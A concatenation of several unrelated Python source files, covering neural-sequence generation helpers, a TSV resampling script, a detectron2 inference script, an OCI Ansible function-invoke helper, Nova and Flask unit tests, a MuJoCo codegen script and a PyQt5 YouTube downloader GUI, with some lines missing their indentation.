    return sequences
def create_simple_overlap_sequences(minicolumns, sequence_length, overlap):
    """Consecutive sequences of ``sequence_length`` units where each
    neighbouring pair of sequences shares ``overlap`` units."""
    step = sequence_length - overlap
    sequences = []
    start = 0
    while start + sequence_length <= minicolumns:
        sequences.append(list(range(start, start + sequence_length)))
        start += step
    return sequences
# The functions for generating sequences
def test_overload_criteria(sample, overload_matrix, overload):
criteria = False
if np.all(overload_matrix[sample] < overload):
criteria = True
return criteria
def modify_overload_matrix(sample, overload_matrix):
    """Increment the usage count of every unit in ``sample`` (in place)."""
    overload_matrix[sample] = overload_matrix[sample] + 1
def remove_overloaded_indexes(overload_matrix, overload, available, removed):
    """Move every unit whose usage count reached ``overload`` out of the
    ``available`` pool and into ``removed`` (both mutated in place)."""
    for unit in np.where(overload_matrix >= overload)[0]:
        if unit not in removed:
            available.remove(unit)
            removed.append(unit)
def test_overlap_criteria(sample, sequences, overlap_dictionary, overlap, candidate_overlap, one_to_one):
    """Test whether the new sample is not in violation of the overlap criteria.

    :param sample: candidate sequence (iterable of unit indexes).
    :param sequences: the sequences accepted so far.
    :param overlap_dictionary: maps sequence number -> per-unit overlap vector
        accumulated so far for that sequence.
    :param overlap: maximum allowed overlap.
    :param candidate_overlap: per-unit vector, mutated in place; units of
        `sample` that intersect any stored sequence are marked 1. Note that
        with one_to_one the first loop may break early, so the marking can be
        partial.
    :param one_to_one: if True, compare the sample against each stored
        sequence independently; if False, compare against each sequence's
        accumulated overlap vector.
    :return: overlap_criteria (True when the sample is acceptable)
    """
    overlap_criteria = True
    for sequence_number, overlap_vector in overlap_dictionary.items():
        # Units shared between the candidate and this stored sequence.
        intersection = [val for val in sample if val in sequences[sequence_number]]
        # Mark the shared units (empty-list fancy indexing is a no-op).
        candidate_overlap[intersection] = 1
        if one_to_one:
            # Pairwise check: reject as soon as one stored sequence shares
            # more than `overlap` units with the candidate.
            if len(intersection) > overlap:
                overlap_criteria = False
                break
        # I have not figure out what this does, apparently it selects for overlap with the same units
        # else:
        #     if np.sum(candidate_overlap) > overlap:
        #         overlap_criteria = False
        #         break
    if not one_to_one:
        # Cumulative check: the new intersection plus the overlap already
        # accumulated for a sequence must not exceed the budget.
        for sequence_number, overlap_vector in overlap_dictionary.items():
            intersection = [val for val in sample if val in sequences[sequence_number]]
            if len(intersection) + np.sum(overlap_vector) > overlap:
                overlap_criteria = False
    return overlap_criteria
def modify_overlap_dictionary(overlap_dictionary, candidate_overlap, sample, n_sequence, sequences):
    """Record an accepted sample in the overlap bookkeeping.

    Marks the units of ``sample`` shared with every stored sequence in that
    sequence's overlap vector, then registers the candidate's own overlap
    vector under ``n_sequence``. All structures are mutated in place.
    """
    for stored_number, overlap_vector in overlap_dictionary.items():
        shared_units = [unit for unit in sample if unit in sequences[stored_number]]
        overlap_vector[shared_units] = 1
    # Register the candidate's overlap vector for future comparisons.
    overlap_dictionary[n_sequence] = candidate_overlap
def remove_overlaped_indexes(overlap_dictionary, sequences, overlap, available, removed):
    """Remove every unit of any stored sequence whose accumulated overlap
    reached the ``overlap`` budget (``available``/``removed`` mutated in place)."""
    for stored_number, overlap_vector in overlap_dictionary.items():
        if np.sum(overlap_vector) < overlap:
            continue
        for unit in sequences[stored_number]:
            if unit not in removed:
                available.remove(unit)
                removed.append(unit)
def calculate_random_sequence(minicolumns, sequence_length, overlap, overload, one_to_one=True,
                              prng=np.random.RandomState(seed=0), total_sequences=10, max_iter=1e5):
    """Randomly draw up to ``total_sequences`` sequences of minicolumn
    indexes subject to overlap and overload constraints.

    Returns ``(sequences, overlap_dictionary, overload_matrix)``. Stops early
    when ``max_iter`` candidate draws have been tried or when fewer than
    ``sequence_length + 1`` units remain available.

    NOTE(review): the default ``prng`` is a single RandomState shared across
    calls (mutable default argument), so successive calls with the default
    continue the same random stream — confirm this is intended.
    """
    # Auxiliary structures
    sequences = []
    overload_matrix = np.zeros(minicolumns)
    available = [i for i in range(minicolumns)]
    removed = []
    overlap_dictionary = {}
    n_sequence = 0
    # Renamed from `iter` to avoid shadowing the builtin.
    n_iterations = 0
    while n_sequence < total_sequences and n_iterations < max_iter:
        n_iterations += 1
        # Generate a possible sample
        if len(available) > sequence_length:
            sample = prng.choice(available, size=sequence_length, replace=False)
        else:
            break
        # Criteria for overload
        overload_criteria = test_overload_criteria(sample, overload_matrix, overload)
        # Criteria for overlap
        candidate_overlap = np.zeros(minicolumns)
        overlap_criteria = test_overlap_criteria(sample, sequences, overlap_dictionary, overlap, candidate_overlap,
                                                 one_to_one)
        if overlap_criteria and overload_criteria:
            # Accept the sample.
            sample_list = list(sample.copy())
            sequences.append(sample_list)
            # Update overlap bookkeeping and retire over-overlapped units.
            modify_overlap_dictionary(overlap_dictionary, candidate_overlap, sample, n_sequence, sequences)
            if not one_to_one:
                remove_overlaped_indexes(overlap_dictionary, sequences, overlap, available, removed)
            # Update overload bookkeeping and retire overloaded units.
            modify_overload_matrix(sample, overload_matrix)
            remove_overloaded_indexes(overload_matrix, overload, available, removed)
            n_sequence += 1
    return sequences, overlap_dictionary, overload_matrix
def calculate_overlap_matrix(sequences):
    """Pairwise overlap counts between sequences, with the diagonal zeroed."""
    n = len(sequences)
    overlap_matrix = np.zeros((n, n))
    for row, seq_a in enumerate(sequences):
        for col, seq_b in enumerate(sequences):
            overlap_matrix[row, col] = len([unit for unit in seq_a if unit in seq_b])
    overlap_matrix[np.diag_indices_from(overlap_matrix)] = 0
    return overlap_matrix
def calculate_overlap_one_to_all(overlap_dictionary):
    """Total accumulated overlap for every stored sequence, as an array
    indexed by sequence number."""
    total_overlap = np.zeros(len(overlap_dictionary))
    for sequence_number, overlap_vector in overlap_dictionary.items():
        total_overlap[sequence_number] = overlap_vector.sum()
    return total_overlap
def calculate_overlap_one_to_one(sequences):
    """Maximum pairwise overlap of each sequence with any other sequence."""
    return np.max(calculate_overlap_matrix(sequences), axis=1)
################
# Old functions
#################
# def get_w_old(P, p, diagonal_zero=True):
# outer = np.outer(p, p)
# P_copy = np.copy(P)
#
# outer[outer < epsilon**2] = epsilon**2
# P_copy[P < epsilon] = epsilon**2
#
# w = np.log(P_copy / outer)
#
# #IPython.embed()
# if diagonal_zero:
# w[np.diag_indices_from(w)] = 0
# return w
#
#
# def get_w_protocol1(P, p):
# p_copy = np.copy(p)
# P_copy = np.copy(P)
#
# p_copy[p < epsilon] = epsilon
# P_copy[P < epsilon] = epsilon * epsilon
#
# aux = np.outer(p_copy, p_copy)
# w = np.log(P_copy / aux)
# # IPython.embed()
#
# return w
|
from os import listdir
from numpy import average
import csv
import random
def TsvToData(filePath):
    """Read a .tsv file and return its contents as an (X, Y) tuple.

    Each row is "<comma separated ints>\\t<label>"; returns
    ([sample_0, ..., sample_n], [label_0, ..., label_n]).
    """
    with open(filePath, 'r') as tsvFile:
        rows = list(csv.reader(tsvFile, delimiter='\t'))
    samples = [[int(value) for value in row[0].split(',')] for row in rows]
    labels = [row[1] for row in rows]
    return (samples, labels)
def LoadFiles(filePath = None):
    """Interactively select .tsv files from a folder and load each via TsvToData.

    Prompts for the folder when ``filePath`` is not given, lists the .tsv
    files it contains, and asks for the indices to load. Returns
    {"file1.tsv": ([data_0, ...], [label_0, ...]), ...}.
    """
    import os  # local import: keeps this fix self-contained
    if filePath is None:
        path = input("What is the path of your data folder?\n>>> ")
    else:
        path = filePath
    dataFiles = [file for file in listdir(path) if file[-4:]==".tsv"]
    for fileNum in range(len(dataFiles)):
        print("{0:02d}\t{1}".format(fileNum,dataFiles[fileNum]))
    selections = [int(x) for x in input("Type in indices of files, each separated by spacing\n>>> ").split()]
    filesDict = {}
    for selection in selections:
        # BUG FIX: os.path.join instead of a hard-coded Windows "\\" separator,
        # which broke path construction on POSIX systems.
        filesDict[dataFiles[selection]] = TsvToData(os.path.join(path, dataFiles[selection]))
    return(filesDict)
def TruncateToMinLength(dataCollection):
    """Match the lengths of all data streams by cutting off the tails of
    longer ones, after confirming with the user.

    ``dataCollection`` maps file name -> (data streams, labels), as produced
    by LoadFiles. Returns ([stream, ...], [label, ...]) flattened across all
    files. NOTE(review): returns None implicitly when the user answers "n".
    """
    print("<<<TruncateToMinLength() in progress>>>")
    # Get minimum length and file name of it
    minLength = 9999999  # sentinel; assumes no stream is longer than this
    fileName = ""
    for name in dataCollection:
        data = dataCollection[name][0]
        for singleDataStream in range(len(data)):
            if len(data[singleDataStream])<minLength:
                minLength = len(data[singleDataStream])
                fileName = "{0}, Line {1}".format(name, singleDataStream)
    # Confirm user action; loop until a clear y/n answer is given.
    userAnswer = ""
    while not(userAnswer.lower() == "y" or userAnswer.lower() == "n"):
        userAnswer = input("The minimum length is {0} from {1}. Would you like to truncate the data?(Y/N)\n>>> ".format(minLength, fileName))
    # Slice every stream to the minimum length and flatten into (X, Y).
    if userAnswer.lower() == "y":
        output = ([], [])
        for dataFile in dataCollection:
            for i in range(len(dataCollection[dataFile][0])):
                output[0].append(dataCollection[dataFile][0][i][:minLength])
                output[1].append(dataCollection[dataFile][1][i])
        return output
def ElongateToMaxLength(dataCollection):
    """Match the lengths of all data streams by appending synthetic values to
    the tails of shorter ones, after confirming with the user.

    The synthetic tail blends linearly from the stream's last point toward
    the stream's average value. Returns ([stream, ...], [label, ...])
    flattened across all files. NOTE(review): returns None implicitly when
    the user answers "n".
    """
    maxLength = 0
    fileName = ""
    # Look for the max length
    for name in dataCollection:
        data = dataCollection[name][0]
        for singleDataStream in range(len(data)):
            if len(data[singleDataStream]) > maxLength:
                maxLength = len(data[singleDataStream])
                fileName = "{0}, Line {1}".format(name, singleDataStream)
    # User confirmation; loop until a clear y/n answer is given.
    userAnswer = ""
    while not(userAnswer.lower() == "y" or userAnswer.lower() == "n"):
        userAnswer = input("The maximum length is {0} from {1}. Would you like to elongate the data?(Y/N)\n>>> ".format(maxLength, fileName))
    # Splice a synthetic tail onto each stream and flatten into (X, Y).
    if userAnswer.lower() == "y":
        output = ([], [])
        for dataFile in dataCollection:
            for i in range(len(dataCollection[dataFile][0])):
                _data=dataCollection[dataFile][0][i]
                lastPoint=_data[-1]
                avg = average(_data)
                lenDiff = maxLength-len(_data)
                # Tail value k steps in: weighted mix of lastPoint and avg
                # (the comprehension's i shadows the outer i only inside it).
                output[0].append(_data + [int(round((lastPoint * (lenDiff - i) + avg * i)/ lenDiff)) for i in range(lenDiff)])
                output[1].append(dataCollection[dataFile][1][i])
        return output
def SaveData(data, filePath = None, fileName = "Processed"):
    """Save XY-split data ``(samples, labels)`` as <fileName>.tsv in filePath.

    Each output line is "<comma separated sample values>\\t<label>". Prompts
    for the folder when ``filePath`` is not given.
    """
    import os  # local import: keeps this fix self-contained
    if filePath is None:
        path = input("What is the path of your data folder?\n>>> ")
    else:
        path = filePath
    # BUG FIX: os.path.join instead of a hard-coded Windows "\\" separator,
    # which produced a file literally named "dir\\name.tsv" on POSIX systems.
    with open(os.path.join(path, "{}.tsv".format(fileName)), 'w') as file:
        for lineNumber in range(len(data[0])):
            file.write(",".join([str(x) for x in data[0][lineNumber]]) + "\t" + data[1][lineNumber] + "\n")
    print("Saved the processed file\n")
def MatchFrequency(dataCollection, originalF = 7840, targetF = 45000):
    """Resample every data stream in ``dataCollection`` from originalF to
    targetF and return the flattened (samples, labels) pair."""
    print("<<<MatchFrequency() in progress>>>")
    output = ([], [])
    print("Processing frequency match from {0} Hz to {1} Hz.".format(originalF, targetF))
    # Pick the resampling routine once, outside the loop.
    if originalF > targetF:
        resample = DecreaseFrequency
    elif originalF < targetF:
        resample = IncreaseFrequency
    else:
        # Frequencies already match: pass the stream through unchanged.
        resample = (lambda stream, _originalF, _targetF: stream)
    for dataFile in dataCollection:
        streams, labels = dataCollection[dataFile]
        for streamIndex in range(len(streams)):
            output[0].append(resample(streams[streamIndex], originalF, targetF))
            output[1].append(labels[streamIndex])
    return output
def IncreaseFrequency(data, originalF, targetF):
    """Upsample ``data`` from originalF to targetF by interpolating between
    neighbouring points; the extra slots are spread pseudo-randomly."""
    baseStep = targetF // originalF
    extraSlots = targetF % originalF
    result = []
    position = 0
    exhausted = False
    # One flag per source sample in a cycle; 1 means one extra output point.
    extraFlags = [1] * extraSlots + [0] * (originalF - extraSlots)
    while not exhausted:
        random.shuffle(extraFlags)
        for flag in extraFlags:
            try:
                result += interpolate(data[position], data[position + 1], baseStep + flag)
            except IndexError:
                # Ran off the end of the input: stop.
                exhausted = True
                break
            position += 1
    return result
def interpolate(point1, point2, numberOfPoints, roundToInt = True):
    """Return ``numberOfPoints`` evenly spaced values from point1 toward
    point2 (point2 itself is excluded). ``numberOfPoints`` must be >= 1."""
    if numberOfPoints == 1:
        return [point1]
    step = (point2 - point1) / numberOfPoints
    values = [point1 + k * step for k in range(numberOfPoints)]
    if roundToInt:
        return [int(round(v)) for v in values]
    return values
def DecreaseFrequency(data, originalF, targetF, avgOption = True):
    """Downsample ``data`` from originalF to targetF.

    Uses a pseudo-random distribution of window sizes so the sampling rate
    matches on average. With ``avgOption`` True each output point is the
    average of the skipped window; otherwise a single point is sampled.
    """
    baseStep = originalF // targetF
    randomAddPossibility = originalF % targetF
    returnData = []
    index = 0
    endOfList = False
    # One flag per output sample in a cycle; 1 widens that window by one.
    randAdd = [1] * randomAddPossibility + [0] * (targetF - randomAddPossibility)
    if avgOption:
        while not endOfList:
            random.shuffle(randAdd)
            for randomArrayIndex in range(targetF):
                # BUG FIX: the original sliced data[prev:index] with
                # prev == index == 0 on the first pass, so the very first
                # window was always empty and the function returned [].
                # Advance to the window end first, then average the window.
                nextIndex = index + baseStep + randAdd[randomArrayIndex]
                window = data[index:nextIndex]
                if window:
                    returnData.append(int(round(average(window))))
                else:
                    endOfList = True
                    break
                index = nextIndex
    else:
        while not endOfList:
            random.shuffle(randAdd)
            for randomArrayIndex in range(targetF):
                try:
                    returnData.append(data[index])
                except IndexError:
                    endOfList = True
                    break
                index += baseStep + randAdd[randomArrayIndex]
    return returnData
# Script entry point: interactively resample the selected .tsv files to a
# common frequency, then pad them to a common length. Note the folder is
# asked for and the files are re-selected for each of the two passes.
if (__name__ == "__main__"):
    filePath = input("What is the path of your data folder?\n>>> ")
    SaveData(MatchFrequency(LoadFiles(filePath)), filePath)
    SaveData(ElongateToMaxLength(LoadFiles(filePath)), filePath)
|
"""
Do inference on msgpack file generated in Command Center
"""
import argparse
import io
import os
import msgpack
import torch
from PIL import Image
from detectron2.config import get_cfg
from detectron2.engine import DefaultPredictor
from torch.utils.data import Dataset
from torch.utils.data.dataloader import DataLoader
class FileDataset(Dataset):
    """Dataset over a msgpack stream file.

    Each msgpack record is a mapping whose "data" key holds an encoded image.
    """

    def __init__(self, file_path) -> None:
        super().__init__()
        # Byte offset of every msgpack record so __getitem__ can seek
        # straight to a record without re-reading the whole file.
        self.index = []
        pos = 0
        self.file_path = file_path
        with open(file_path, "rb") as f:
            unpacker = msgpack.Unpacker(f)
            for _ in unpacker:
                self.index.append(pos)
                pos = unpacker.tell()

    def __getitem__(self, index: int):
        with open(self.file_path, "rb") as f:
            f.seek(self.index[index])
            unpacker = msgpack.Unpacker(f)
            unpacked = unpacker.unpack()
            image = Image.open(io.BytesIO(unpacked.get("data")))
            # BUG FIX: torch.tensor cannot infer a dtype from a PIL Image and
            # raises TypeError; convert through a numpy array first.
            import numpy as np  # local import: keeps this edit self-contained
            return torch.from_numpy(np.asarray(image))

    def __len__(self) -> int:
        return len(self.index)
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("--file", required=True)
    # BUG FIX: numeric options arrive as strings from the command line;
    # without type=int they break consumers that expect integers.
    parser.add_argument("--skip_head", type=int, default=0)
    parser.add_argument("--config", required=True)
    parser.add_argument("--weights")
    parser.add_argument("--output_dir", required=True)
    parser.add_argument("--num_workers", type=int, default=4)
    parser.add_argument("--write_original", action="store_true")
    parser.add_argument("--write_processed", action="store_true")
    parser.add_argument("--write_result_json", action="store_true")
    args = parser.parse_args()

    # Build the predictor from the config, optionally overriding the weights.
    cfg = get_cfg()
    cfg.merge_from_file(args.config)
    if args.weights:
        cfg.MODEL.WEIGHTS = args.weights
    predictor = DefaultPredictor(cfg)

    dataset = FileDataset(args.file)
    dataloader = DataLoader(dataset, num_workers=args.num_workers)
    # BUG FIX: a DataLoader yields batches, not (index, batch) pairs;
    # enumerate supplies the counter.
    for i, batch in enumerate(dataloader):
        print(f"Processing batch {i}")
        output = predictor(batch)
|
# Copyright (c) 2020, 2022 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from ansible_collections.oracle.oci.plugins.module_utils import oci_config_utils
try:
from oci.functions import FunctionsInvokeClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class FunctionActionsHelperCustom:
    """Custom behavior for the `invoke` action on a Function resource.

    The invoke action uses a different client (FunctionsInvokeClient) than the
    one that is generated for the function resource (FunctionsManagementClient)
    based on other operations. Currently codegen only supports one client class
    for a resource. The other option would have been renaming the resource for
    this operation which would have generated with the invoke client. But we
    would still need the FunctionsManagementClient to get the function's
    invoke endpoint.
    """

    # TODO: Add support for multiple client classes in codegen
    def invoke(self):
        """Invoke the function through its dedicated invoke endpoint."""
        # `dest` is where the invocation response is written; fail fast if missing.
        if not self.module.params.get("dest"):
            self.module.fail_json(msg="dest parameter required for invoke action")
        function = self.get_resource().data
        # The invoke client must target the function's own invoke endpoint,
        # not the regional management endpoint.
        self.module.params["service_endpoint"] = function.invoke_endpoint
        functions_invoke_client = oci_config_utils.create_service_client(
            self.module, FunctionsInvokeClient
        )
        try:
            # Temporarily change self.client in the context of this method. Preferring this over overriding the
            # self.client to use FunctionsInvokeClient since there might be other actions (for ex: change_compartment)
            # in the future which need the client generated by the generated module.
            functions_management_client = self.client
            self.client = functions_invoke_client
            super(FunctionActionsHelperCustom, self).invoke()
            return function
        finally:
            # Always restore the management client, even if invoke raises.
            self.client = functions_management_client
|
# Copyright 2013 Intel Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for resource monitors."""
import mock
from nova.compute import monitors
from nova import test
class MonitorsTestCase(test.NoDBTestCase):
    """Test case for monitors."""

    @mock.patch('stevedore.enabled.EnabledExtensionManager')
    def test_check_enabled_monitor(self, _mock_ext_manager):
        """check_enabled_monitor() admits each monitor class only once and
        handles the auto-prefixed cpu namespace."""
        # Minimal stand-in for a stevedore extension: only the attributes
        # that MonitorHandler inspects.
        class FakeExt(object):
            def __init__(self, ept, name):
                self.entry_point_target = ept
                self.name = name

        # We check to ensure only one CPU monitor is loaded...
        self.flags(compute_monitors=['mon1', 'mon2'])
        handler = monitors.MonitorHandler(None)
        ext_cpu_mon1 = FakeExt('nova.compute.monitors.cpu.virt_driver:Monitor',
                               'mon1')
        ext_cpu_mon2 = FakeExt('nova.compute.monitors.cpu.virt_driver:Monitor',
                               'mon2')
        # Both extensions resolve to the same CPU monitor class, so only the
        # first may be enabled.
        self.assertTrue(handler.check_enabled_monitor(ext_cpu_mon1))
        self.assertFalse(handler.check_enabled_monitor(ext_cpu_mon2))

        # We check to ensure that the auto-prefixing of the CPU
        # namespace is handled properly...
        self.flags(compute_monitors=['cpu.mon1', 'mon2'])
        handler = monitors.MonitorHandler(None)
        ext_cpu_mon1 = FakeExt('nova.compute.monitors.cpu.virt_driver:Monitor',
                               'mon1')
        ext_cpu_mon2 = FakeExt('nova.compute.monitors.cpu.virt_driver:Monitor',
                               'mon2')
        self.assertTrue(handler.check_enabled_monitor(ext_cpu_mon1))
        self.assertFalse(handler.check_enabled_monitor(ext_cpu_mon2))
|
# Copyright 2022 DeepMind Technologies Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Code generator for function_traits.h."""
from typing import Mapping, Sequence
from absl import app
from introspect import ast_nodes
from introspect import enums
ENUMS: Mapping[str, ast_nodes.EnumDecl] = enums.ENUMS
def main(argv: Sequence[str]) -> None:
    """Generate enum_traits.h: one traits struct per MuJoCo enum plus a
    kAllEnums tuple instantiating them all, written to stdout."""
    if len(argv) > 1:
        raise app.UsageError('Too many command-line arguments.')

    struct_decls = []
    for enum in ENUMS.values():
        # One ("name", ::Enum::value) pair per enumerator.
        value_decls = []
        for k in enum.values:
            value_decls.append(f'std::make_pair("{k}", ::{enum.name}::{k})')
        # A single entry stays inline; longer lists get one entry per line.
        if len(value_decls) < 2:
            value_decls = ''.join(value_decls)
        else:
            value_decls = '\n  ' + ',\n  '.join(value_decls)
        struct_decls.append(f"""
struct {enum.name} {{
  static constexpr char name[] = "{enum.name}";
  using type = ::{enum.name};
  static constexpr auto values = std::array{{{value_decls}}};
}};
""".strip())

    all_structs = '\n\n'.join(struct_decls)
    # One value-initialized instance of each traits struct for kAllEnums.
    all_enum_inits = '\n  ' + '{},\n  '.join(ENUMS.keys()) + '{}'
    print(f"""
// Copyright 2022 DeepMind Technologies Limited
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//     http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

#ifndef MUJOCO_PYTHON_CODEGEN_ENUM_TRAITS_H_
#define MUJOCO_PYTHON_CODEGEN_ENUM_TRAITS_H_

#include <array>
#include <tuple>
#include <utility>

#include <mujoco.h>

namespace mujoco::python_traits {{

{all_structs}

static constexpr auto kAllEnums = std::make_tuple({all_enum_inits});

}}  // namespace mujoco::python_traits

#endif  // MUJOCO_PYTHON_CODEGEN_ENUM_TRAITS_H_
""".lstrip())
if __name__ == '__main__':
    # Delegate to absl, which parses flags and calls main(argv).
    app.run(main)
|
import unittest
from jmilkfansblog.controllers import admin
from jmilkfansblog.controllers import rest_api
from jmilkfansblog import create_app
from jmilkfansblog.models import db
class TestURLs(unittest.TestCase):
    """Unit test for route functions."""

    def setUp(self):
        # Reset the Flask-Admin and Flask-Restful registries so a fresh app
        # can re-register its views/resources between tests.
        admin._views = []
        rest_api.resource = []
        # NOTE(review): Flask-Restful normally tracks registered resources in
        # `rest_api.resources` — confirm this attribute name is correct.

        app = create_app('jmilkfansblog.config.TestConfig')
        self.client = app.test_client()

        # Bind the db to the test app and create the schema.
        db.app = app
        db.create_all()

    def tearDown(self):
        # Drop all tables and detach the session so tests stay isolated.
        db.session.remove()
        db.drop_all()
if __name__ == '__main__':
    # Run this test module directly.
    unittest.main()
|
import threading
from PyQt5 import QtCore
from PyQt5.QtCore import QObject
from PyQt5.QtWidgets import QMainWindow, QLayout, QListWidgetItem
from PyQt5.QtWidgets import QWidget
from PyQt5.QtWidgets import QVBoxLayout
from PyQt5.QtWidgets import QHBoxLayout
from PyQt5.QtWidgets import QLineEdit
from PyQt5.QtWidgets import QPushButton
from PyQt5.QtWidgets import QCheckBox
from PyQt5.QtWidgets import QListWidget
from Downloader import Downloader
from PyQt5.QtWidgets import QLabel
from PyQt5.QtWidgets import QMessageBox
from PyQt5.QtWidgets import QFileDialog
from UrlParserWorker import ParserWorker
import time
class DownloaderMainWindow(QMainWindow, QObject):
    """Main window of the Pytube-GUI downloader.

    Wires the widgets built by the nested ``UI`` class to a ``Downloader``
    instance and runs URL parsing and downloading on background threads,
    updating widgets only through signals delivered on the UI thread.
    """

    # Signal carrying (list item to update, text to display). Widgets may
    # only be modified from the UI thread, so worker threads emit this
    # signal instead of touching the widgets directly.
    PARSE_URL_SIGNAL = QtCore.pyqtSignal(QListWidgetItem, str)

    def __init__(self, download_manager=Downloader()):
        # NOTE(review): the default Downloader() is created once at class
        # definition time and shared by every window using the default
        # (mutable default argument) — confirm this is intended.
        super().__init__()
        self.setWindowTitle("Pytube-GUI")
        self.__download_manager = download_manager
        # ui contains all the widgets for the main window.
        self.__ui = self.UI(self)
        # The directory line edit is read-only so the user can only choose a
        # path through the Browse dialog, guaranteeing a valid directory.
        self.__ui.dir_line_edit.setText(self.__download_manager.get_download_directory())
        self.__ui.dir_line_edit.setReadOnly(True)
        self.setCentralWidget(self.__ui)
        # Widget listeners.
        self.__ui.add_button.clicked.connect(self.add_button_clicked)
        self.__ui.remove_button.clicked.connect(self.remove_button_clicked)
        self.__ui.browse_button.clicked.connect(self.browse_button_clicked)
        self.__ui.mp3_checkbox.clicked.connect(self.mp3_checked_clicked)
        self.__ui.download_button.clicked.connect(self.download_button_clicked)
        self.__ui.parallel_checkbox.clicked.connect(self.parallel_checkbox_clicked)
        # The video list starts empty, so hide it and the download button.
        self.hide_list()
        # Route the parse signal to the UI-thread slot that updates list items.
        self.PARSE_URL_SIGNAL.connect(self.set_list_widget_text)
        # Keep QThread objects referenced: letting them be garbage collected
        # while running crashes the UI thread.
        self.__threads = []
        # List items whose URLs are still being parsed (or failed to parse).
        self.__parsing_waitlist = []
        print('GUI initialized')

    def download_button_clicked(self):
        """Start the download on a background thread, unless URLs are pending."""
        if len(self.__parsing_waitlist) != 0:
            QMessageBox.about(self, "Alert", "Wait for urls to finish parsing. Also remove the invalid and duplicated links first.")
            return
        # Native Python thread keeps the UI responsive during the download.
        thread = threading.Thread(target=self.__download_button_thread_function, name='Download button clicked thread',args=())
        thread.start()

    def __download_button_thread_function(self):
        """Worker: disable controls, run the download, re-enable when done."""
        print('\nStarting download.....')
        # Disable all the controls until the download finishes.
        # NOTE(review): these setEnabled calls happen on a worker thread;
        # Qt widgets should only be touched from the UI thread — confirm.
        self.__ui.add_button.setEnabled(False)
        self.__ui.remove_button.setEnabled(False)
        self.__ui.browse_button.setEnabled(False)
        self.__ui.download_button.setEnabled(False)
        self.__ui.download_button.setText('Downloading.....')
        self.__ui.mp3_checkbox.setEnabled(False)
        self.__ui.parallel_checkbox.setEnabled(False)
        # Download.
        self.__download_manager.download()
        # Poll until the manager reports no downloads in progress, then
        # restore the controls.
        while self.__download_manager.get_number_of_downloads_in_progress() != 0:
            time.sleep(1)
        self.__ui.add_button.setEnabled(True)
        self.__ui.remove_button.setEnabled(True)
        self.__ui.browse_button.setEnabled(True)
        self.__ui.download_button.setEnabled(True)
        self.__ui.download_button.setText('Download')
        self.__ui.mp3_checkbox.setEnabled(True)
        self.__ui.parallel_checkbox.setEnabled(True)

    def parallel_checkbox_clicked(self):
        """Toggle experimental parallel downloading on the manager."""
        if self.__ui.parallel_checkbox.isChecked():
            self.__download_manager.use_multithreading(True)
            QMessageBox.about(self, "Alert", "Downloading in parallel enables downloads of multiple videos in parallel but do note that this feature is experimental")
        else:
            self.__download_manager.use_multithreading(False)

    def show_list(self):
        """Show the video list and download button."""
        self.__ui.video_list.show()
        self.__ui.download_button.show()

    def hide_list(self):
        """Hide the video list and download button (used when the list is empty)."""
        self.__ui.video_list.hide()
        self.__ui.download_button.hide()

    def add_button_clicked(self):
        """Add the typed URL as a placeholder item and parse it on a QThread."""
        self.__ui.video_list.addItem("Parsing url...")
        item_position = self.__ui.video_list.count() - 1
        item = self.__ui.video_list.item(item_position)
        name = self.__ui.url_line_edit.text()
        if self.__ui.download_button.isHidden():
            self.show_list()
        # Track the item so the download button knows parsing is incomplete.
        self.__parsing_waitlist.append(item)
        # The parser worker emits signals for the UI thread to update widgets.
        # It must be bound to an instance attribute or the thread malfunctions.
        self.worker = ParserWorker(item, name, self)
        thread = QtCore.QThread()
        # Keep the thread referenced: PyQt5 crashes the UI thread if a running
        # QThread object is garbage collected.
        self.__threads.append(thread)
        # Move the worker to the thread so its work runs off the UI thread.
        self.worker.moveToThread(thread)
        # Run the worker's job as soon as the thread starts.
        thread.started.connect(self.worker.run)
        thread.start()

    def parse_Url_Function(self, item, url):
        """Resolve the URL into a video name; called from the parser worker."""
        video_name = self.__download_manager.add_video(url)
        # Parsing succeeded: the item no longer blocks the download button.
        print('url parsing is successful!')
        self.__parsing_waitlist.remove(item)
        return video_name

    def set_list_widget_text(self, item, text):
        """UI-thread slot: update a list item's text (connected to PARSE_URL_SIGNAL)."""
        item.setText(text)

    def remove_button_clicked(self):
        """Remove the selected video from the list and the download manager."""
        if self.__ui.video_list.currentItem() is None:
            QMessageBox.about(self, "Alert", "You need to select an item in the video list")
            return
        selectedItem = self.__ui.video_list.currentItem()
        self.__ui.video_list.takeItem(self.__ui.video_list.row(selectedItem))
        self.__download_manager.remove_video(selectedItem.text())
        if selectedItem in self.__parsing_waitlist:
            self.__parsing_waitlist.remove(selectedItem)
        self.__ui.video_list.setCurrentItem(None)
        self.__ui.video_list.clearFocus()
        if self.__ui.video_list.count() == 0:
            self.hide_list()

    def browse_button_clicked(self):
        """Let the user pick the download directory via a native dialog."""
        dir = QFileDialog.getExistingDirectory(parent=self, directory=self.__download_manager.get_download_directory(), options=QFileDialog.DontResolveSymlinks)
        if dir != "":
            self.__ui.dir_line_edit.setText(dir)
